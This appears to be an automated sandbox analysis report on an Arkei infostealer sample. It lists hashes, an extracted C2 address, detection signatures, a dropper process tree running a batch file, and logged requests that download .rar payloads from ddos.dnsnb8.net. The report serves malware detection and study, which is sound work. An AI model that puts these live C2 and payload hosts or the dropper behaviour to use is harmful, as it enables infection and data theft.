Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/07/2024, 03:31 UTC

General

  • Target

    6aa9785c788205916c58c12be189e23101c3b8137e08a851061968d6e1826b59.exe

  • Size

    175KB

  • MD5

    9e31bf43798ffd4d029c94caff29023e

  • SHA1

    d96e79d2bd84ec6ce72d5195cd7cb55ac5db2e68

  • SHA256

    6aa9785c788205916c58c12be189e23101c3b8137e08a851061968d6e1826b59

  • SHA512

    8ad8bec5075be1e803724d1d962b2f99badb96b94f992c2005c5fb5e389af6378450b624c21c940579140b6b5a34b4587645be7035f031125b3b93252e4d124a

  • SSDEEP

    3072:K/E8k9V0JIYmDdMh1+foxoSaS4eH53U/tV+FNb8EGBGCH:K/E8k9SgD6/Tmb/r+Fp8EG0

Malware Config

Extracted

Family

arkei

Botnet

Default

C2

62.3.12.9/oCWKaZ5eh7.php

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

  • ASPack v2.12-2.42 1 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6aa9785c788205916c58c12be189e23101c3b8137e08a851061968d6e1826b59.exe
    "C:\Users\Admin\AppData\Local\Temp\6aa9785c788205916c58c12be189e23101c3b8137e08a851061968d6e1826b59.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3656
    • C:\Users\Admin\AppData\Local\Temp\boxRcG.exe
      C:\Users\Admin\AppData\Local\Temp\boxRcG.exe
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3588
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1771230c.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2928

Network

  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dnsgoogle
  • flag-us
    DNS
    ddos.dnsnb8.net
    boxRcG.exe
    Remote address:
    8.8.8.8:53
    Request
    ddos.dnsnb8.net
    IN A
    Response
    ddos.dnsnb8.net
    IN A
    44.221.84.105
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k1.rar
    boxRcG.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k1.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k2.rar
    boxRcG.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k2.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k3.rar
    boxRcG.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k3.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k4.rar
    boxRcG.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k4.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    DNS
    183.142.211.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    183.142.211.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    105.84.221.44.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    105.84.221.44.in-addr.arpa
    IN PTR
    Response
    105.84.221.44.in-addr.arpa
    IN PTR
    ec2-44-221-84-105 compute-1 amazonawscom
  • flag-us
    DNS
    73.144.22.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    73.144.22.2.in-addr.arpa
    IN PTR
    Response
    73.144.22.2.in-addr.arpa
    IN PTR
    a2-22-144-73deploystaticakamaitechnologiescom
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k5.rar
    boxRcG.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k5.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    DNS
    g.bing.com
    Remote address:
    8.8.8.8:53
    Request
    g.bing.com
    IN A
    Response
    g.bing.com
    IN CNAME
    g-bing-com.dual-a-0034.a-msedge.net
    g-bing-com.dual-a-0034.a-msedge.net
    IN CNAME
    dual-a-0034.a-msedge.net
    dual-a-0034.a-msedge.net
    IN A
    13.107.21.237
    dual-a-0034.a-msedge.net
    IN A
    204.79.197.237
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=d61e09239b344723b8ea6f8bf826fe7c&localId=w:A12AC88C-949E-57CB-CC9F-17EBD2A35AF9&deviceId=6825836757625552&anid=
    Remote address:
    13.107.21.237:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=d61e09239b344723b8ea6f8bf826fe7c&localId=w:A12AC88C-949E-57CB-CC9F-17EBD2A35AF9&deviceId=6825836757625552&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MUID=073244B4C88568C8044A5073C93E6909; domain=.bing.com; expires=Tue, 19-Aug-2025 03:31:20 GMT; path=/; SameSite=None; Secure; Priority=High;
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: B88C87F1AFA642D0A258C3D32B16C444 Ref B: LON04EDGE0916 Ref C: 2024-07-25T03:31:20Z
    date: Thu, 25 Jul 2024 03:31:19 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=d61e09239b344723b8ea6f8bf826fe7c&localId=w:A12AC88C-949E-57CB-CC9F-17EBD2A35AF9&deviceId=6825836757625552&anid=
    Remote address:
    13.107.21.237:443
    Request
    GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=d61e09239b344723b8ea6f8bf826fe7c&localId=w:A12AC88C-949E-57CB-CC9F-17EBD2A35AF9&deviceId=6825836757625552&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=073244B4C88568C8044A5073C93E6909
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MSPTC=fT6J38-7GuuW8K4gLuAkLOZsB2Of_wWknuZuJAVOvcg; domain=.bing.com; expires=Tue, 19-Aug-2025 03:31:20 GMT; path=/; Partitioned; secure; SameSite=None
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 1E31BCC06CC648F2AF036BE093BC0EC6 Ref B: LON04EDGE0916 Ref C: 2024-07-25T03:31:20Z
    date: Thu, 25 Jul 2024 03:31:19 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=d61e09239b344723b8ea6f8bf826fe7c&localId=w:A12AC88C-949E-57CB-CC9F-17EBD2A35AF9&deviceId=6825836757625552&anid=
    Remote address:
    13.107.21.237:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=d61e09239b344723b8ea6f8bf826fe7c&localId=w:A12AC88C-949E-57CB-CC9F-17EBD2A35AF9&deviceId=6825836757625552&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=073244B4C88568C8044A5073C93E6909; MSPTC=fT6J38-7GuuW8K4gLuAkLOZsB2Of_wWknuZuJAVOvcg
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 5BD8092485E54D5CA3AE581E27D34D1F Ref B: LON04EDGE0916 Ref C: 2024-07-25T03:31:20Z
    date: Thu, 25 Jul 2024 03:31:19 GMT
  • flag-us
    DNS
    134.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    134.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    237.21.107.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    237.21.107.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    13.86.106.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.86.106.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    86.23.85.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    86.23.85.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    15.164.165.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    15.164.165.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    81.144.22.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    81.144.22.2.in-addr.arpa
    IN PTR
    Response
    81.144.22.2.in-addr.arpa
    IN PTR
    a2-22-144-81deploystaticakamaitechnologiescom
  • flag-us
    DNS
    172.214.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.214.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    26.35.223.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    26.35.223.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    48.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    48.229.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    tse1.mm.bing.net
    Remote address:
    8.8.8.8:53
    Request
    tse1.mm.bing.net
    IN A
    Response
    tse1.mm.bing.net
    IN CNAME
    mm-mm.bing.net.trafficmanager.net
    mm-mm.bing.net.trafficmanager.net
    IN CNAME
    ax-0001.ax-msedge.net
    ax-0001.ax-msedge.net
    IN A
    150.171.27.10
    ax-0001.ax-msedge.net
    IN A
    150.171.28.10
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239339388091_1UZ9QPHUDICWZFIUE&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239339388091_1UZ9QPHUDICWZFIUE&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 487795
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: E7A703F8E57C40C4BAACF1B5B389CE95 Ref B: LON04EDGE1221 Ref C: 2024-07-25T03:32:56Z
    date: Thu, 25 Jul 2024 03:32:56 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239317301013_1R2AO9YZ4I5BGB4K2&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239317301013_1R2AO9YZ4I5BGB4K2&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 558070
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: C6C0BFE22C9F4BEE915F96E76C892787 Ref B: LON04EDGE1221 Ref C: 2024-07-25T03:32:56Z
    date: Thu, 25 Jul 2024 03:32:56 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239317301446_1EN88Z1GJDY90F0IF&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239317301446_1EN88Z1GJDY90F0IF&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 548581
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: C7A3D06BD222413FA6A37E272C741A3F Ref B: LON04EDGE1221 Ref C: 2024-07-25T03:32:56Z
    date: Thu, 25 Jul 2024 03:32:56 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239339388092_16GTZ1ZLJFZVK1WDY&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239339388092_16GTZ1ZLJFZVK1WDY&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 398516
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 5E93AAC5164A4FAF8C8C1838F6170E5F Ref B: LON04EDGE1221 Ref C: 2024-07-25T03:32:56Z
    date: Thu, 25 Jul 2024 03:32:56 GMT
  • flag-us
    DNS
    8.179.89.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.179.89.13.in-addr.arpa
    IN PTR
    Response
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k1.rar
    http
    boxRcG.exe
    564 B
    296 B
    6
    7

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k1.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k2.rar
    http
    boxRcG.exe
    564 B
    296 B
    6
    7

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k2.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k3.rar
    http
    boxRcG.exe
    564 B
    296 B
    6
    7

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k3.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k4.rar
    http
    boxRcG.exe
    564 B
    296 B
    6
    7

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k4.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k5.rar
    http
    boxRcG.exe
    564 B
    296 B
    6
    7

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k5.rar
  • 13.107.21.237:443
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=d61e09239b344723b8ea6f8bf826fe7c&localId=w:A12AC88C-949E-57CB-CC9F-17EBD2A35AF9&deviceId=6825836757625552&anid=
    tls, http2
    2.0kB
    9.2kB
    21
    17

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=d61e09239b344723b8ea6f8bf826fe7c&localId=w:A12AC88C-949E-57CB-CC9F-17EBD2A35AF9&deviceId=6825836757625552&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=d61e09239b344723b8ea6f8bf826fe7c&localId=w:A12AC88C-949E-57CB-CC9F-17EBD2A35AF9&deviceId=6825836757625552&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=d61e09239b344723b8ea6f8bf826fe7c&localId=w:A12AC88C-949E-57CB-CC9F-17EBD2A35AF9&deviceId=6825836757625552&anid=

    HTTP Response

    204
  • 150.171.27.10:443
    tse1.mm.bing.net
    tls, http2
    1.1kB
    6.9kB
    14
    13
  • 150.171.27.10:443
    tse1.mm.bing.net
    tls, http2
    1.1kB
    6.9kB
    14
    13
  • 150.171.27.10:443
    https://tse1.mm.bing.net/th?id=OADD2.10239339388092_16GTZ1ZLJFZVK1WDY&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    tls, http2
    69.3kB
    1.9MB
    1419
    1420

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239339388091_1UZ9QPHUDICWZFIUE&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239317301013_1R2AO9YZ4I5BGB4K2&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239317301446_1EN88Z1GJDY90F0IF&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239339388092_16GTZ1ZLJFZVK1WDY&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200
  • 150.171.27.10:443
    tse1.mm.bing.net
    tls, http2
    1.1kB
    6.9kB
    14
    13
  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
    90 B
    1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    ddos.dnsnb8.net
    dns
    boxRcG.exe
    61 B
    77 B
    1
    1

    DNS Request

    ddos.dnsnb8.net

    DNS Response

    44.221.84.105

  • 8.8.8.8:53
    183.142.211.20.in-addr.arpa
    dns
    73 B
    159 B
    1
    1

    DNS Request

    183.142.211.20.in-addr.arpa

  • 8.8.8.8:53
    105.84.221.44.in-addr.arpa
    dns
    72 B
    127 B
    1
    1

    DNS Request

    105.84.221.44.in-addr.arpa

  • 8.8.8.8:53
    73.144.22.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    73.144.22.2.in-addr.arpa

  • 8.8.8.8:53
    g.bing.com
    dns
    56 B
    151 B
    1
    1

    DNS Request

    g.bing.com

    DNS Response

    13.107.21.237
    204.79.197.237

  • 8.8.8.8:53
    134.32.126.40.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    134.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    237.21.107.13.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    237.21.107.13.in-addr.arpa

  • 8.8.8.8:53
    13.86.106.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    13.86.106.20.in-addr.arpa

  • 8.8.8.8:53
    86.23.85.13.in-addr.arpa
    dns
    70 B
    144 B
    1
    1

    DNS Request

    86.23.85.13.in-addr.arpa

  • 8.8.8.8:53
    15.164.165.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    15.164.165.52.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    81.144.22.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    81.144.22.2.in-addr.arpa

  • 8.8.8.8:53
    172.214.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.214.232.199.in-addr.arpa

  • 8.8.8.8:53
    26.35.223.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    26.35.223.20.in-addr.arpa

  • 8.8.8.8:53
    48.229.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    48.229.111.52.in-addr.arpa

  • 8.8.8.8:53
    tse1.mm.bing.net
    dns
    62 B
    170 B
    1
    1

    DNS Request

    tse1.mm.bing.net

    DNS Response

    150.171.27.10
    150.171.28.10

  • 8.8.8.8:53
    8.179.89.13.in-addr.arpa
    dns
    70 B
    144 B
    1
    1

    DNS Request

    8.179.89.13.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\WZ04RUV6\k2[1].rar

    Filesize

    4B

    MD5

    d3b07384d113edec49eaa6238ad5ff00

    SHA1

    f1d2d2f924e986ac86fdf7b36c94bcdf32beec15

    SHA256

    b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c

    SHA512

    0cf9180a764aba863a67b6d72f0918bc131c6772642cb2dce5a34f0a702f9470ddc2bf125c12198b1995c233c34b4afd346c54a2334c350a948a51b6e8b4e6b6

  • C:\Users\Admin\AppData\Local\Temp\1771230c.bat

    Filesize

    187B

    MD5

    87e101e14e01070b71e032d7958695df

    SHA1

    bb0bd881522dd79903d3c75334a3c00a773316b7

    SHA256

    906bbabbcb69402ac7ceab9f1a6ee88d0adf468f13d48250fd2c949308a87b6c

    SHA512

    5c567f0c7b0e692ab53f1f67ff53b2a7eaadd4864ef3501206b1ea765f88220c506783021f0ff3864a39bad16741456cda5802581aa6bfa64e5140ebf46b4e8b

  • C:\Users\Admin\AppData\Local\Temp\2B3668E9.exe

    Filesize

    4B

    MD5

    20879c987e2f9a916e578386d499f629

    SHA1

    c7b33ddcc42361fdb847036fc07e880b81935d5d

    SHA256

    9f2981a7cc4d40a2a409dc895de64253acd819d7c0011c8e80b86fe899464e31

    SHA512

    bcdde1625364dd6dd143b45bdcec8d59cf8982aff33790d390b839f3869e0e815684568b14b555a596d616252aeeaa98dac2e6e551c9095ea11a575ff25ff84f

  • C:\Users\Admin\AppData\Local\Temp\boxRcG.exe

    Filesize

    15KB

    MD5

    f7d21de5c4e81341eccd280c11ddcc9a

    SHA1

    d4e9ef10d7685d491583c6fa93ae5d9105d815bd

    SHA256

    4485df22c627fa0bb899d79aa6ff29bc5be1dbc3caa2b7a490809338d54b7794

    SHA512

    e4553b86b083996038bacfb979ad0b86f578f95185d8efac34a77f6cc73e491d4f70e1449bbc9eb1d62f430800c1574101b270e1cb0eeed43a83049a79b636a3

  • memory/3588-5-0x0000000000D80000-0x0000000000D89000-memory.dmp

    Filesize

    36KB

  • memory/3588-45-0x0000000000D80000-0x0000000000D89000-memory.dmp

    Filesize

    36KB

  • memory/3656-0-0x0000000000C20000-0x0000000000C61000-memory.dmp

    Filesize

    260KB

  • memory/3656-47-0x0000000000C20000-0x0000000000C61000-memory.dmp

    Filesize

    260KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.